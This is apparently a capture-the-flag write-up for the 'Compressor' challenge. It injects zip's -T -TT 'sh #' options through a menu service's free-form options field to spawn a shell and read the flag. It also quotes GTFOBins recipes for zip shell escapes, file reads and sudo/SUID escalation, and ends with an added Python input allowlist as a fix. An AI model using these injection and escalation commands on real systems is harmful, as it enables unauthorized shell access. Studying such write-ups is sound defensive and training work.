Compressor
For this challenge we are only given a remote instance to connect to:
$ nc 157.245.33.77 31001
[*] Directory to work in: 9wIylX4fBakMNG8u6YfY37k3k1geVXHv
Component List:
+===============+
| |
| 1. Head 🤖 |
| 2. Torso 🦴 |
| 3. Hands 💪 |
| 4. Legs 🦵 |
| |
+===============+
[*] Choose component:
We can choose the first one, for example:
[*] Choose component: 1
[*] Sub-directory to work in: 9wIylX4fBakMNG8u6YfY37k3k1geVXHv/Head
Actions:
1. Create artifact
2. List directory (pwd; ls -la)
3. Read artifact (cat ./<name>)
4. Compress artifact (zip <name>.zip <name> <options>)
5. Change directory (cd <dirname>)
6. Clean directory (rm -rf ./*)
7. Exit
[*] Choose action:
Alright, we have some options to work with.
We see that we can use zip as a command and provide options. If we check GTFOBins, we discover that we can actually get a shell with a specific parameter.
You can also check out my tool gtfobins-cli to view this information from the command line interface:
$ gtfobins-cli zip
zip ==> https://gtfobins.github.io/gtfobins/zip/
Shell
It can be used to break out from restricted environments by spawning an interactive system shell.
TF=$(mktemp -u)
zip $TF /etc/hosts -T -TT 'sh #'
rm $TF
File read
It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.
LFILE=file-to-read
TF=$(mktemp -u)
zip $TF $LFILE
unzip -p $TF
Sudo
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF
Limited SUID
If the binary has the SUID bit set, it may be abused to access the file system, escalate or maintain access with elevated privileges working as a SUID backdoor. If it is used to run commands (e.g., via system()-like invocations) it only works on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.
sudo install -m =xs $(which zip) .
TF=$(mktemp -u)
./zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF
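Perfect, so we can use -T -TT 'sh #' as command options to get a shell: -T tells zip to test the archive after writing it, and -TT replaces the command used for that test, so zip ends up running sh. But first, we must create an artifact, because we do not have anything in the current working directory: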
[*] Choose action: 2
/home/ctf/Rm4gXvPOefWkBXd3VYlOQyrGvLEnwNMm/Head
total 8
drwxr-sr-x 2 ctf ctf 4096 May 19 00:45 .
drwxr-sr-x 6 ctf ctf 4096 May 19 00:45 ..
Actions:
1. Create artifact
2. List directory (pwd; ls -la)
3. Read artifact (cat ./<name>)
4. Compress artifact (zip <name>.zip <name> <options>)
5. Change directory (cd <dirname>)
6. Clean directory (rm -rf ./*)
7. Exit
[*] Choose action: 1
Insert name: asdf
Insert content: asdf
[+] Artifact [asdf] was created successfuly!
Actions:
1. Create artifact
2. List directory (pwd; ls -la)
3. Read artifact (cat ./<name>)
4. Compress artifact (zip <name>.zip <name> <options>)
5. Change directory (cd <dirname>)
6. Clean directory (rm -rf ./*)
7. Exit
[*] Choose action:
Now we can use the GTFOBin to get a shell and find the flag:
[*] Choose action: 4
Insert <name>.zip: asdf
Insert <name>: asdf
Insert <options>: -T -TT 'sh #'
adding: asdf (stored 0%)
whoami
ctf
cd ..
ls
Hands
Head
Legs
Torso
cd ..
ls
Rm4gXvPOefWkBXd3VYlOQyrGvLEnwNMm
artifacts.py
clear.py
flag.txt
cat flag.txt
HTB{z1pp1ti_z0pp1t1_GTFO_0f_my_pr0p3rty}
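The shell was possible because the service hands the free-form <options> string to zip. The following is an added example, not the challenge's artifacts.py (its source is not shown here), of how the compress action could validate its input; the function names, the option allowlist and the name pattern are assumptions made for illustration:

```python
import re
import shlex
import subprocess

# Hypothetical allowlist: compression level and verbosity only. Anything that
# makes zip run another program (-T with -TT, as used in the write-up) is absent.
ALLOWED_OPTIONS = {f"-{n}" for n in range(10)} | {"-q", "-v"}

# Names must start with an alphanumeric character, so they can never be parsed
# as an option, and they cannot contain a path separator.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.-]{0,63}")


def build_zip_argv(archive, name, options):
    """Return an argv list for zip, or raise ValueError on unsafe input."""
    for value in (archive, name):
        if not SAFE_NAME.fullmatch(value):
            raise ValueError(f"invalid name: {value!r}")
    try:
        tokens = shlex.split(options)
    except ValueError as exc:  # for example, unbalanced quotes
        raise ValueError(f"unparsable options: {exc}") from None
    for token in tokens:
        # Exact match only, so bundled forms such as -9T are rejected too.
        if token not in ALLOWED_OPTIONS:
            raise ValueError(f"option not allowed: {token!r}")
    # The ./ prefix keeps both paths inside the working directory.
    return ["zip", *tokens, f"./{archive}.zip", f"./{name}"]


def compress(archive, name, options, cwd):
    """Run zip without a shell, using only validated arguments."""
    argv = build_zip_argv(archive, name, options)
    return subprocess.run(argv, cwd=cwd, capture_output=True, text=True, check=False)
```

With this check, the options string used above is rejected before zip is ever started, while ordinary requests such as -9 -q still work.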